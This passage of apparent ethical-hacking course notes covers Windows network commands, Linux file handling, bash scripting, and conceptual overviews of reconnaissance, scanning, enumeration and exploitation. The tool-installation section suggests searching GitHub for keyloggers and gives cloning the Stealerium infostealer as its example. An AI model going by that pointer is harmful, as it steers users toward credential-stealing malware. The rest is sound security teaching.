
between IP addresses and MAC addresses.

Example:
$ arp -a

Output:
Interface: 192.168.1.10 --- 0x12
Internet Address Physical Address Type
192.168.1.1 00-14-22-01-23-45 Dynamic

7. Command: route

Description: Displays or modifies the system's routing table.

Example:
$ route print

Output:
IPv4 Route Table
===================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
0.0.0.0 0.0.0.0 192.168.1.1 192.168.1.10 25

8. Command: telnet

Description: Connects to a remote host using the Telnet protocol.

Example:
$ telnet example.com 23

Output:
Trying 203.0.113.1...
Connected to example.com.
Escape character is '^]'.
Welcome to the Telnet server!

9. Command: ftp

Description: Transfers files to/from remote FTP servers.

Example:
$ ftp example.com

Output:
Connected to example.com.
220 Welcome to the FTP server.
Name (example.com:user):

10. Command: net

Description: Manages network resources, such as shares, sessions, and users.

Example:
$ net view

Output:
Server Name Remark
-----------------------------------------
\\SERVER1 File Server
\\SERVER2 Database Server
The command completed successfully.

11. Command: netsh

Description: A powerful command-line utility for managing network configurations, including IP


settings, firewall, and routing.

Example:
$ netsh interface ip show config

Output:
Configuration for interface "Ethernet"
DHCP enabled: Yes
IP Address: 192.168.1.10
Subnet Mask: 255.255.255.0
Default Gateway: 192.168.1.1

12. Command: net use

Description: Connects to or disconnects from shared network resources.

Example:
$ net use Z: \\SERVER1\shared_folder

Output:
The command completed successfully.

13. Command: net view

Description: Displays a list of computers or shared resources on a network.

Example:
$ net view \\SERVER1

Output:
Shared resources at \\SERVER1
Resource Type Comment
-----------------------------------------
shared_folder Disk Shared Documents
The command completed successfully.

14. Command: net share

Description: Creates, deletes, or manages shared folders on the local computer.

Example:
$ net share shared_docs=C:\Shared

Output:
shared_docs was shared successfully.

15. Command: net session

Description: Displays and manages active network sessions with the local computer.

Example:
$ net session

Output:
Computer User name Client Type Opens Idle time
192.168.1.15 admin Windows 2 00:15:30
The command completed successfully.

16. Command: net time

Description: Synchronizes the local computer's clock with a network time server.

Example:
$ net time \\SERVER1 /set /yes

Output:
The current time at \\SERVER1 is 11/26/2024 10:15:42 AM.
The command completed successfully.

17. Command: netdom

Description: A domain management tool for joining computers to a domain, resetting passwords,
and more.

Example:
$ netdom join MYCOMPUTER /domain:example.local /userd:admin /passwordd:*

Output:
The machine account password was successfully reset.
The command completed successfully.

18. Command: route print

Description: Displays the system's routing table in detail.

Example:
$ route print

Output:

IPv4 Route Table
===================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
0.0.0.0 0.0.0.0 192.168.1.1 192.168.1.10 25

19. Command: nbtstat

Description: Displays NetBIOS over TCP/IP statistics and the status of current connections.

Example:
$ nbtstat -a 192.168.1.10

Output:
Local Area Connection:
Node IpAddress: [192.168.1.10] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status


---------------------------------------------
MYCOMPUTER <00> UNIQUE Registered

20. Command: ipconfig /flushdns

Description: Clears and resets the DNS resolver cache.

Example:
$ ipconfig /flushdns

Output:
Successfully flushed the DNS Resolver Cache.

21. Command: ipconfig /release

Description: Releases the current DHCP configuration for all network adapters.

Example:
$ ipconfig /release

Output:
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 0.0.0.0
Subnet Mask . . . . . . . . . . . : 0.0.0.0
Default Gateway . . . . . . . . . :

22. Command: ipconfig /renew

Description: Requests a new DHCP configuration for all network adapters.

Example:
$ ipconfig /renew

Output:
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . : example.local
IPv4 Address. . . . . . . . . . . : 192.168.1.10
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1

23. Command: netsh firewall

Description: Configures the Windows Firewall settings.

Example:
$ netsh firewall set opmode mode=enable

Output:
Ok.

24. Command: netstat -a

Description: Displays all active network connections and listening ports.

Example:
$ netstat -a

Output:
Active Connections

Proto Local Address Foreign Address State


TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 192.168.1.10:49238 example.com:80 ESTABLISHED
UDP 0.0.0.0:123 *:*

Week 03

10. EHP View, Create and Edit Files

View, Create and Edit Files


1. View Files
>> cat

Description: The cat command is used to display the contents of a file on the terminal. It stands for
"concatenate" and is often used for displaying small files or combining multiple files.
Example:
$ cat example.txt
Hello, this is an example file.
This file contains a few lines of text.

Output:
Hello, this is an example file.
This file contains a few lines of text.

>> more

Description: The more command is used to view the contents of a file one screen at a time. It allows
scrolling through large files.

Example:
$ more longfile.txt

Output (first few lines):


This is a long file that will be displayed one screen at a time.
Press space to scroll down, 'q' to quit.

>> less

Description: Similar to more, but with more features, less allows backward navigation and is more
versatile for viewing large files.

Example:
$ less largefile.txt

Output:
This is a large file. You can scroll up and down with arrow keys, search with '/' and quit with 'q'.

>> head

Description: The head command is used to display the first few lines (default 10) of a file.

Example:
$ head example.txt

Output (first 10 lines):


Line 1: Example of head command output
Line 2: Displaying the first 10 lines of the file.
Line 3: This is just a sample text.

>> tail

Description: The tail command is used to display the last few lines (default 10) of a file. It’s often
used with the -f option to monitor log files in real-time.

Example:
$ tail example.log

Output (last 10 lines):
Error: Failed to load configuration.
Warning: Disk space low.

To follow a log file in real-time:


$ tail -f example.log
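The viewing commands above can be tried together on a generated file (a minimal sketch):

```shell
f=$(mktemp)
seq 1 20 > "$f"   # write the numbers 1..20, one per line
head -n 3 "$f"    # first three lines: 1, 2, 3
tail -n 2 "$f"    # last two lines: 19, 20
wc -l < "$f"      # 20 lines in total
rm -f "$f"
```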

2. Create Files
>> touch

Description: The touch command is used to create an empty file or update the timestamp of an
existing file.

Example:
$ touch newfile.txt

Output: Creates an empty file named newfile.txt (or updates its timestamp if the file already exists).

>> echo

Description: The echo command is used to create a file with content by redirecting output into a file.

Example:
$ echo "This is a new file" > file.txt

Output: Creates file.txt with the content:


This is a new file

>> cat (for creating files)

Description: You can also use cat to create a new file and write content into it. Press Ctrl+D to save
and exit.

Example:
$ cat > newfile.txt

Output:
(typing) This is some text.
(typing) Another line of text.
Press Ctrl+D to save.

After pressing Ctrl+D, newfile.txt will contain:


This is some text.
Another line of text.
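One detail worth remembering about redirection when creating files: > truncates (or creates) the file, while >> appends to it. A minimal sketch:

```shell
f=$(mktemp)
echo "first" > "$f"    # '>' creates or overwrites
echo "second" >> "$f"  # '>>' appends
cat "$f"               # prints: first, then second
echo "only" > "$f"     # '>' again: the previous contents are gone
cat "$f"               # prints: only
rm -f "$f"
```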

>> nano / vim / vi (for creating files)

Description: These text editors can be used to create and edit files interactively.

nano is a simple command-line text editor.


vim/vi is a powerful text editor with many features.
Example:
$ nano newfile.txt

Output: Opens the nano editor, where you can type text. Press Ctrl+O to save, Ctrl+X to exit.

Or with vim:
$ vim newfile.txt

Output: Opens the vim editor. Press i to enter insert mode, type text, then press Esc, type :wq to save
and quit.

3. Edit Files
>> nano

Description: nano is a terminal-based text editor that is easy to use. It allows editing of files directly
in the terminal.

Example:
$ nano example.txt

Output: Opens example.txt in the nano editor. You can edit the file directly in the terminal, and save
with Ctrl+O, then exit with Ctrl+X.

>> vim/vi

Description: vim (or vi) is a more advanced text editor, suitable for both simple and complex text
editing tasks. It requires learning basic commands to use efficiently.

Example:
$ vim example.txt

Output: Opens example.txt in vim.


Press i to enter insert mode (to edit the text).
After editing, press Esc to exit insert mode.
Type :wq to save and quit.

>> sed
Description: sed is a stream editor that can modify file content directly from the command line,
making it useful for automated edits. It supports search and replace, insertions, and deletions.

Example:
$ sed -i 's/oldword/newword/' file.txt

Output:
Replaces the first occurrence of "oldword" on each line of file.txt (use 's/oldword/newword/g' to replace all occurrences)

To replace text without modifying the original file:


$ sed 's/oldword/newword/' file.txt

>> awk
Description: awk is a powerful text processing tool. It can perform actions on files based on patterns
and conditions.

Example:
$ awk '{ print $1 }' example.txt

Output:
(prints the first field of each line in the file `example.txt`)
Line1Field1
Line2Field1
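Both tools can be exercised together on a throwaway file (a minimal sketch):

```shell
f=$(mktemp)
printf 'alice 30\nbob 25\n' > "$f"
sed 's/alice/carol/' "$f"        # edited stream to stdout; the file is unchanged (no -i)
awk '{ print $1 }' "$f"          # first field of every line: alice, bob
awk '$2 > 26 { print $1 }' "$f"  # pattern + action: only alice matches
rm -f "$f"
```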

--------------------------------------------------------------------------------------------------------

Additional Useful Commands for File Management

>> cp (Copy Files)

Description: Copies files or directories.

Example:
$ cp source.txt destination.txt

>> mv (Move/Rename Files)


Description: Moves or renames files and directories.
Example:
$ mv oldname.txt newname.txt

>> rm (Remove Files)


Description: Removes files or directories.
Example:
$ rm file.txt

>> chmod (Change File Permissions)


Description: Changes file permissions (read, write, execute).
Example:
$ chmod +x script.sh

4. Advanced File Viewing Techniques


>> grep

Description: The grep command is used to search for patterns within files. It can be combined with
other commands or used by itself to find specific text in large files.

Example:
$ grep "error" logfile.txt

Output:
Error: File not found.
Error: Network connection lost.

You can also use grep with the -r option to recursively search within a directory:
$ grep -r "keyword" /path/to/directory/

>> find

Description: The find command searches for files and directories within a specified location based on
various criteria (e.g., file name, modification time, size).

Example:
$ find /home/user/ -name "*.txt"

Output:
/home/user/file1.txt
/home/user/docs/file2.txt

To search for files modified within the last 7 days:


$ find /path/to/dir -mtime -7
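A self-contained sketch combining grep and find in a scratch directory:

```shell
d=$(mktemp -d)
printf 'ok\nerror: disk full\n' > "$d/app.log"
touch "$d/notes.txt"
grep -r "error" "$d"         # recursive search; prints the matching line
find "$d" -name '*.log'      # search by name pattern
find "$d" -mtime -7 -type f  # files modified within the last 7 days (both qualify here)
rm -r "$d"
```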

5. File Compression & Archiving


>> tar

Description: tar is used to create, extract, or list archive files. Commonly used with compression
tools like gzip or bzip2 to compress archives.

Example (Create an archive):


$ tar -cvf archive.tar /path/to/directory/

Output:
directory1/
directory1/file1.txt

Example (Extract an archive):


$ tar -xvf archive.tar

Example (Compress with gzip):


$ tar -czvf archive.tar.gz /path/to/directory/

Example (Extract a .tar.gz file):


$ tar -xzvf archive.tar.gz

>> zip / unzip

Description: zip and unzip are used to create and extract .zip files.

Example (Create a zip file):


$ zip -r archive.zip /path/to/directory/

Example (Extract a zip file):


$ unzip archive.zip

>> gzip / gunzip

Description: gzip is used for file compression and gunzip is used to decompress .gz files.
Example (Compress a file):
$ gzip example.txt

Example (Decompress a .gz file):


$ gunzip example.txt.gz
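A full round trip with tar and gzip on scratch data (a minimal sketch):

```shell
d=$(mktemp -d)
mkdir "$d/src"
echo "hello" > "$d/src/file.txt"
tar -czf "$d/archive.tar.gz" -C "$d" src  # create a compressed archive of src/
mkdir "$d/out"
tar -xzf "$d/archive.tar.gz" -C "$d/out"  # extract it somewhere else
cat "$d/out/src/file.txt"                 # prints: hello
rm -r "$d"
```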

-----------------------------------------------------------------------------------------

6. File Editing with Multiple Tools


>> vim - Editing Multiple Files

Description: You can open multiple files in vim using tabs or buffers for easier editing.

Example:
$ vim file1.txt file2.txt

Use :bn to switch to the next file, and :bp to go back to the previous file.

>> multitail

Description: multitail is useful for viewing multiple log files at the same time in a split-screen format.

Example:
$ multitail /var/log/syslog /var/log/auth.log

Conclusion
This expanded file management handbook provides a broader set of tools for working with files in
Linux. It includes methods for viewing, creating, and editing files.

As well as more advanced techniques for managing permissions, compressing, searching, and
backing up files. Familiarity with these commands will greatly enhance your productivity when
working in Linux environments.

By combining these commands, you can streamline tasks and automate workflows to increase
efficiency.

11. EHP Installing and Updating Tools

Installing and Updating Tools


For updating package lists and upgrading installed packages
>> sudo apt update && sudo apt upgrade

If you face a problem, installing the cron daemon package may help

# apt install cron-daemon-common

Note:
If you need to install a tool, search for it on a search engine and read its installation process.
Many tools are hosted on GitHub; searching for the tool name together with "GitHub" will find them.

For example, search:
keylogger GitHub parrot Linux
https://github.com/topics/keylogger

To install a GitHub tool, clone its repository:

>> git clone <tool link>

Example:
>> git clone https://github.com/Stealerium/Stealerium.git

12. EHP Scripting with Bash

Scripting with Bash

Scripting with Bash: A Brief Overview

Bash (Bourne Again Shell) is a widely used command-line interpreter for Unix-like systems such as
Linux and macOS. It allows users to write and execute scripts (files containing a series of
commands) that automate tasks and simplify system management.

Bash scripts are written in plain text and can perform a wide variety of tasks, such as system
administration, data processing, file management, and interacting with network resources.

Key Concepts of Bash Scripting:

1. Shebang (#!):
Every bash script begins with the "shebang" line (#!/bin/bash), which tells the system to execute the
script using the Bash interpreter.

Example:

#!/bin/bash

2. Variables:
You can store values in variables for later use. These can be strings, numbers, or results from
commands.

Example:

name="John"
echo "Hello, $name"

3. Commands:
Bash scripts execute commands just as you would in the terminal. This can include system
commands like ls, cp, mv, ifconfig, ip, and custom scripts or applications.

4. Control Flow:
Bash provides basic control flow structures such as if/else, for loops, while loops, and case
statements.

Example:

if [ $x -eq 5 ]; then
echo "x is 5"
else
echo "x is not 5"
fi

5. Functions:
You can define reusable blocks of code in functions. Functions can accept parameters and return
values.

Example:

greet() {
echo "Hello, $1"
}

greet "Alice" # Outputs: Hello, Alice

6.Comments:
Anything after a # symbol is considered a comment and is ignored by the shell. Comments are
useful for explaining the purpose of the script or specific lines of code.

Example:

# This is a comment

7. Input and Output:

Input: You can capture user input using the read command.

read -p "Enter your name: " username


echo "Hello, $username"

Output: Use echo or printf to display output.

echo "This is an echo statement."


printf "This is a formatted output.\n"

8. Pipes and Redirection:

Pipes (|) allow you to send the output of one command as input to another.

Redirection (>, >>) allows you to send output to a file instead of the terminal.

Example:

ls | grep "pattern" # Pipe output of `ls` into `grep`
echo "Hello World" > file.txt # Redirect output to file

9. Exit Status:
Each command in Bash returns an exit status (also known as a return code), where 0 means success
and any non-zero value indicates an error. This can be checked using $?.

Example:

echo "This will succeed"


echo $? # Outputs: 0

ls non_existent_file
echo $? # Outputs: 2 (ls could not access the file)

10. Loops:
Loops allow you to repeat actions multiple times. For example:

For loop:

for i in {1..5}; do
echo "Number $i"
done

While loop:

count=1
while [ $count -le 5 ]; do
echo "Count is $count"
((count++))
done

11. Error Handling:


It’s a good practice to check for errors in scripts using conditional statements or using set -e to make
the script exit on any error.

Example:

set -e # Exit immediately if any command fails
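The effect of set -e can be observed in a child shell without risking your own session (a minimal sketch):

```shell
# Under set -e, the failing `false` aborts the script before the echo runs
bash -c 'set -e; false; echo "never reached"' || echo "script exited early (status $?)"

# Without set -e, the script simply continues after the failure
bash -c 'false; echo "kept going"'
```

The first command prints the fallback message because the child bash exits with status 1 at `false`.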

Advantages of Bash Scripting:

• Automation: Bash scripts can automate repetitive tasks, saving time and reducing human error.

• Integration: Bash scripts can call and integrate with many other system tools and utilities, making
them extremely powerful.

• Portability: Bash scripts are portable across many Linux and Unix-like systems.

• Lightweight: Unlike more complex programming languages, bash scripts are lightweight and
execute quickly.

Use Cases for Bash Scripting:

• System Administration: Automating backups, monitoring system resources, managing users.

• File Management: Renaming, moving, deleting, or organizing files in bulk.

• Networking: Automating tasks such as network configuration, testing connectivity, and managing
network interfaces.

• Data Processing: Filtering, sorting, and transforming text files or logs.

• Installation/Deployment: Automating the installation of software or setting up environments.

Here’s a simple bash script that combines several of these network commands. The script executes
each of them sequentially and displays the network interface details, routing information, and ARP
cache.

#!/bin/bash

# Displaying information about network interfaces using ifconfig


echo "Displaying network interfaces with ifconfig:"
ifconfig
echo ""

# Displaying network interfaces with ip a


echo "Displaying network interfaces with ip a:"
ip a
echo ""

# Displaying wireless interfaces information using iwconfig


echo "Displaying wireless interface information with iwconfig:"
iwconfig
echo ""

# Displaying neighbor information (ARP table) using ip n


echo "Displaying ARP table with ip n:"
ip n
echo ""

# Displaying ARP cache using arp -a


echo "Displaying ARP cache with arp -a:"
arp -a
echo ""

# Displaying routing table using ip r


echo "Displaying routing table with ip r:"
ip r

echo ""

# Displaying routing table with route


echo "Displaying routing table with route:"
route

Instructions to use:

1. Create a new script file: Save the above code in a new file, for example, network_info.sh.

2. Make it executable: Run the following command to make the script executable:

>> chmod +x network_info.sh

3. Run the script: Execute the script with:

>> ./network_info.sh

Conclusion

Bash scripting is an essential skill for system administrators, developers, and power users who work
with Unix-like systems. It enables users to efficiently automate tasks, manage files, and interact with
the operating system, saving time and effort.

By understanding how to write and execute bash scripts, you can streamline your workflows and
ensure that repetitive tasks are handled automatically.

Week 04 Footprinting for Ethical Hacking

13. EHP Passive Recon (Reconnaissance Overview)

Passive Recon (Reconnaissance Overview)


The five stages of Ethical Hacking

1. Reconnaissance

Reconnaissance refers to the process of gathering information about a target, often for the purpose
of conducting an attack, security testing, or intelligence collection.

In the context of cybersecurity and ethical hacking, reconnaissance is a critical first step in
identifying potential vulnerabilities in a system or network before launching an attack or penetration
test.

Reconnaissance can be classified into two main types:

• Active
• Passive

Active Reconnaissance:

Active reconnaissance involves directly interacting with a target system or network to gather
information. In this approach, the attacker or security tester sends requests or queries to the target,
and the target responds with data that can be analyzed for vulnerabilities.

This type of recon can include actions like port scanning, banner grabbing, and other forms of direct
probing. Active recon is typically more risky because it can alert the target to the presence of the
attacker or tester.

Examples of Active Reconnaissance:

• Port scanning (e.g., using tools like Nmap)


• DNS interrogation
• Tracerouting
• Banner grabbing
• Service version detection

Passive Reconnaissance:

Passive reconnaissance involves gathering information about a target without directly interacting
with it. This approach relies on publicly available data, such as information on websites, social
media, DNS records, or other open-source intelligence (OSINT) sources. Since there is no direct
interaction with the target, passive recon is less likely to be detected by the target.

Examples of Passive Reconnaissance:

• Searching through public records, WHOIS data, and DNS records


• Scanning social media platforms for employee or organizational details
• Analyzing open-source intelligence (OSINT) like news articles or domain registrations
• Examining websites, IP addresses, and network configurations through external tools

In summary, active recon involves engaging directly with the target to retrieve information, while
passive recon involves collecting information through observation without direct interaction with the
target system.

Reconnaissance in the Context of Penetration Testing:

For penetration testers, reconnaissance is the initial phase of the engagement. It helps testers
understand the target environment and scope out potential attack vectors.

Ethical hackers perform both active and passive reconnaissance (following legal and ethical
guidelines) to map out the attack surface and identify vulnerabilities before attempting exploitation.

Steps in a Typical Reconnaissance Phase:

• Planning: Understanding the scope and objectives of the test, which systems or services are in-
scope, and gathering publicly available information (e.g., domain names, email addresses).

• Reconnaissance (Active & Passive): Collecting further information about the systems involved
using tools and techniques for OSINT gathering, network mapping, and scanning.

• Vulnerability Identification: Based on the information collected, identifying potential vulnerabilities


that can be targeted in later stages of the penetration test.

Reconnaissance in Military or Espionage Context:

Reconnaissance is also a military term used to describe the act of gathering intelligence on an
enemy or area of interest, typically before an operation or engagement.

In espionage, it involves covertly acquiring data about a target, such as enemy movements,
resources, or capabilities, without being detected.

Reconnaissance in General:
More broadly, reconnaissance refers to any process of exploring or surveying an area or subject to
gather information, whether for military, business, or other purposes.

Conclusion:

Reconnaissance is a foundational phase in both offensive and defensive cybersecurity, as it sets the
stage for understanding the target environment. Whether done actively or passively, effective
reconnaissance can help identify security gaps.

Allowing defenders to fortify defenses or allowing attackers to find points of weakness. It’s an
essential process for anyone involved in cybersecurity, ethical hacking, or even general intelligence
gathering.

2. Scanning & Enumeration (Nmap, Nikto, Nessus)

Scanning and enumeration are two crucial stages in the process of network security assessment,
penetration testing, or cyberattacks. Both are part of the reconnaissance phase and focus on
gathering more specific and detailed information about a target network or system.

These processes help an attacker or penetration tester identify the systems, services, and potential
vulnerabilities that may exist within a network.

Scanning

Scanning is the process of systematically probing a target system or network to gather information
about the devices, open ports, services, and potential security weaknesses. It involves sending
requests or probes to a target system and analyzing the responses to build a map of the network or
device.

There are different types of scanning techniques, each serving specific purposes.

Types of Scanning:

Port Scanning:

This is one of the most common scanning techniques. It involves identifying open ports on a target
system. Open ports can provide clues about the services running on the system (e.g., HTTP on port
80, SSH on port 22). Attackers can use this information to find vulnerabilities in services running on
these ports.

Tools: Nmap, Netcat, Masscan, Nikto, Nessus

Common Port Scan Types:

TCP Connect Scan: Establishes a full TCP connection to the target system to see if the port is open.

SYN Scan: Only sends a SYN packet to the target, which can be used to determine if a port is open
without completing the connection (more stealthy).

FIN Scan: Sends a TCP FIN packet to a port to check if it’s open (stealthy scan method).

Network Scanning:

This is used to discover devices on a network. It typically involves identifying the IP address range of
the target and then probing each address to identify live systems (hosts).

Tools: Nmap, Angry IP Scanner, Netdiscover

Vulnerability Scanning:

This type of scan attempts to detect vulnerabilities in a system by matching known vulnerabilities
(usually from databases such as CVE Common Vulnerabilities and Exposures) against the target's
services, operating systems, and configurations.

Tools: Nessus, Acunetix, Qualys, Nexpose

Operating System Fingerprinting:

This type of scan tries to identify the operating system running on a target system by analyzing the
responses to network traffic. Different operating systems (e.g., Windows, Linux) respond differently
to certain types of network traffic.

Tools: Nmap (OS detection), Xprobe2

Scanning Techniques in Action:

Network Discovery: Scanning helps identify active devices (IP addresses, routers, firewalls) on the
network and how they are connected.

Service Discovery: Scanning identifies which services are running on open ports (e.g., HTTP, FTP,
SSH, SMB).

Vulnerability Identification: By scanning for known vulnerabilities in services or devices, testers can
locate potential attack vectors.

Enumeration

Enumeration is a deeper, more detailed stage of information gathering that occurs after scanning. It
involves actively collecting information from a system or network, focusing on gathering specific
details about the services, users, systems, and network resources that are available.

Enumeration goes beyond just identifying open ports and services and aims to extract more
granular information, such as usernames, group memberships, shares, or version numbers.

Types of Enumeration:

Service Enumeration: After scanning a network for open ports, the next step is to enumerate the
specific services running on those ports. This includes identifying:

Service name (e.g., HTTP, FTP)

Service version

Configuration details of the service

Tools: Nmap (service version detection), Netcat, Banner Grabbing

SMB Enumeration: In the case of Windows-based networks, SMB (Server Message Block)
enumeration is important for discovering shared folders, network shares, user lists, and more.

Tools: SMBclient, Enum4linux, Netview, Nmap (SMB scripts)

NetBIOS Enumeration: NetBIOS enumeration is used in Windows environments to find machine
names, user names, group memberships, and shares.

Tools: NetbiosScan, Nmblookup, Enum4linux

DNS Enumeration: This involves querying DNS servers to retrieve records like A records (IP
addresses for domains), MX records (mail servers), NS records (nameservers), and more. DNS
enumeration can reveal subdomains, which can be useful for identifying additional attack surfaces.

Tools: dnsenum, Fierce, Nmap (DNS scripts)
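
A minimal subdomain brute-force works by generating candidate names from a wordlist and attempting to resolve each one. This sketch only illustrates the idea (the wordlist and domain are placeholders; real tools like dnsenum and Fierce add zone transfers, record-type queries, and large wordlists):

```python
import socket

def candidates(domain, words):
    """Build candidate subdomain names from a wordlist."""
    return [f"{w}.{domain}" for w in words]

def resolve_live(names):
    """Return a mapping of the names that actually resolve to an IP address."""
    live = {}
    for name in names:
        try:
            live[name] = socket.gethostbyname(name)
        except socket.gaierror:
            pass  # NXDOMAIN or resolution failure
    return live

if __name__ == "__main__":
    names = candidates("example.com", ["www", "mail", "dev"])
    print(resolve_live(names))
```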

LDAP Enumeration: LDAP (Lightweight Directory Access Protocol) is often used to access and manage
directory services in networks. LDAP enumeration allows attackers to discover details about users,
groups, and organizational structures in a network.

Tools: ldapsearch, Enum4linux (for Linux/Windows), JXplorer

NFS Enumeration: In Unix/Linux environments, NFS (Network File System) enumeration helps identify
shared resources like file systems and directories.

Tools: showmount, Nmap (NFS scripts)

Email Enumeration: This type of enumeration identifies valid email addresses associated with a
target domain. Attackers can then use this information for spear-phishing attacks or other social
engineering tactics.

Tools: Harvester, Email Extractor, Nmap (scripts)

Enumeration Techniques in Action:

User Enumeration: Extracting valid usernames from a target system, which can be used for further
attacks like brute-forcing passwords.

Share Enumeration: Discovering network shares (files, printers, etc.) to gain access to sensitive data.

Configuration Information: Extracting detailed configuration information from services (e.g.,
database version numbers, web server types) to identify potential vulnerabilities.

Key Differences Between Scanning and Enumeration

Purpose: Scanning identifies open ports, active services, and vulnerabilities; enumeration extracts
specific details such as usernames, shares, and configurations.

Depth: Scanning is surface-level discovery of systems and services; enumeration is deeper and more
granular.

Risk of Detection: Scanning can be more detectable (especially active scanning); enumeration is also
active and often noisier, since it queries services directly.

Tools: Scanning uses Nmap, Masscan, Netcat, Nessus, OpenVAS; enumeration uses Enum4linux,
SMBclient, dnsenum, ldapsearch, showmount.

Typical Activities: Scanning covers port scanning, OS fingerprinting, and vulnerability scanning;
enumeration covers user, share, and service-version enumeration.

Conclusion

Scanning helps to map out a network or system by discovering active devices, open ports, and
running services.

Enumeration goes a step further by querying services to extract specific information about them,
such as usernames, shares, and configurations.

Both scanning and enumeration are essential steps in security assessments and penetration testing,
allowing security professionals to identify vulnerabilities and attack vectors. They are also key
stages for attackers in gathering detailed information needed to launch more focused and targeted
attacks.

3. Gaining Access (Exploitation)

Gaining Access (also known as Exploitation) is a crucial phase in a penetration test, cyberattack, or
ethical hacking process, where the information collected during reconnaissance, scanning, and
enumeration is used to exploit identified vulnerabilities and gain unauthorized access to a target
system or network. This phase often marks the transition from passive or preparatory activities to
active exploitation of weaknesses.

Exploitation: Overview

Exploitation is the act of leveraging discovered vulnerabilities (such as open ports,
misconfigurations, unpatched software, weak passwords, etc.) to gain unauthorized access to a
target. This phase involves deploying tools, techniques, and exploits that allow an attacker or tester
to execute code, escalate privileges, and gain control over a target system.

The goal is to exploit a vulnerability to execute malicious code or take control of a system in some
way, either to perform further attacks or to assess the security posture of the system.

Types of Exploits

Exploitation can involve several types of attacks depending on the nature of the vulnerability. These
can range from exploiting open ports, weak services, software flaws, to social engineering attacks.
Here are the primary types:

Remote Exploits:

These involve attacks where the attacker does not need physical access to the target system. They
exploit vulnerabilities over a network connection (e.g., via the internet or a local network).

Examples:

Buffer Overflow Exploits: Attacking a system by sending more data than a program can handle,
causing it to overwrite adjacent memory and allowing an attacker to run arbitrary code.

Web Application Exploits: Exploiting vulnerabilities in web applications, such as SQL injection, cross-
site scripting (XSS), or remote code execution (RCE).

Local Exploits:

Local exploits occur when the attacker has some level of access to the target system. The attacker
can exploit a vulnerability from within the system (e.g., executing commands with higher privileges).

Examples:

Privilege Escalation: Exploiting a system flaw or misconfiguration to elevate a user’s privileges from
standard user to administrator or root.

Password Cracking: Gaining access by cracking weak or exposed passwords stored in a local system
file or database.

Social Engineering Attacks:

This form of exploitation leverages human psychology to trick individuals into providing sensitive
information or taking actions that lead to security breaches.

Examples:

Phishing: Sending fraudulent emails or messages to steal sensitive data (e.g., login credentials).

Pretexting: Pretending to be someone else (e.g., an IT admin) to trick employees into disclosing
information.

Baiting: Enticing a user to click on a malicious link or download an infected file.

Denial of Service (DoS) and Distributed Denial of Service (DDoS):

While primarily used for disruption rather than gaining access, these attacks involve exploiting
vulnerabilities to overwhelm a system or network, rendering it unavailable to legitimate users.

Password Attacks:

These attacks target weak or stolen passwords to gain unauthorized access to systems or accounts.
Exploitation often begins by cracking or guessing the password.

Examples:

Brute Force Attack: Trying all possible combinations to guess a password.

Dictionary Attack: Using a precompiled list of common passwords to guess the correct one.

Credential Stuffing: Using previously leaked passwords and usernames to try and access other
accounts where users might have reused their credentials.
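
The dictionary attack above can be illustrated offline against a stolen password hash. This is a minimal sketch using SHA-256 purely for demonstration; real crackers such as Hashcat or John the Ripper support many hash formats, rules, and GPU acceleration, and the passwords here are made up:

```python
import hashlib

def dictionary_attack(target_hash, wordlist):
    """Hash each candidate word and compare it to the stolen hash."""
    for word in wordlist:
        if hashlib.sha256(word.encode()).hexdigest() == target_hash:
            return word  # candidate matches: password recovered
    return None  # no candidate in the wordlist matched

if __name__ == "__main__":
    stolen = hashlib.sha256(b"letmein").hexdigest()
    print(dictionary_attack(stolen, ["123456", "password", "letmein"]))  # letmein
```

A brute force attack is the same loop over every possible combination instead of a precompiled list, which is why it is slower but exhaustive.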

Exploitation Methods and Tools

Various tools and techniques are used to exploit vulnerabilities and gain access to target systems.
Some of the most common methods include:

Exploiting Web Application Vulnerabilities:

SQL Injection (SQLi): An attacker inserts malicious SQL code into input fields to manipulate the
database.

Cross-Site Scripting (XSS): Injecting malicious scripts into webpages viewed by users to steal session
cookies or redirect to malicious sites.

Remote Code Execution (RCE): Exploiting vulnerabilities in web applications to execute arbitrary
commands on a server.

Tools:

SQLmap: Automates the process of detecting and exploiting SQL injection flaws.

Burp Suite: A popular tool for web vulnerability scanning and exploitation, including XSS and RCE.

Metasploit: A framework that includes many exploits, including those for web applications.
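
The SQL injection flaw listed above comes from building queries with string concatenation. This self-contained sqlite3 sketch puts the vulnerable pattern next to the parameterized fix; the table and data are invented for the demo:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

def vulnerable_lookup(name):
    # String concatenation: attacker input becomes part of the SQL itself.
    return conn.execute(
        f"SELECT secret FROM users WHERE name = '{name}'").fetchall()

def safe_lookup(name):
    # Parameterized query: input is treated as data, never as SQL.
    return conn.execute(
        "SELECT secret FROM users WHERE name = ?", (name,)).fetchall()

payload = "' OR '1'='1"            # classic injection string
print(vulnerable_lookup(payload))  # dumps every row's secret
print(safe_lookup(payload))        # returns nothing
```

SQLmap automates finding and exploiting exactly this class of mistake; the parameterized version is the standard defense.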

Exploiting Network Vulnerabilities:


SMB (Server Message Block) Exploits: Exploiting weak configurations or vulnerabilities in SMB to
gain access to shared files and system resources (e.g., EternalBlue, used in WannaCry).

RDP (Remote Desktop Protocol) Exploits: Exploiting weak configurations or vulnerabilities in RDP to
gain remote access to Windows machines.

Tools:

Metasploit: Provides several exploits for SMB and RDP vulnerabilities.

Hydra: A brute force tool used to guess passwords for various services, including SSH, RDP, and FTP.

Impacket: A collection of Python scripts that enable interaction with network protocols, such as SMB
and RDP.

Privilege Escalation:
After gaining initial access, attackers may exploit local vulnerabilities to escalate their privileges and
obtain full control of the system.

Methods:

Kernel Exploits: Exploiting bugs in the operating system kernel to gain root or administrator access.

Weak File Permissions: Exploiting improper file permissions to escalate privileges.

Sudo Caching Attacks: If sudo permissions are improperly configured, an attacker might escalate
privileges by running commands as a higher-privileged user.

Tools:

LinPEAS (Linux Privilege Escalation Awesome Script): A tool that automates the process of finding
privilege escalation opportunities on Linux systems.

Windows Exploit Suggester: A tool that suggests Windows privilege escalation techniques based on
the OS version.

Metasploit Framework:

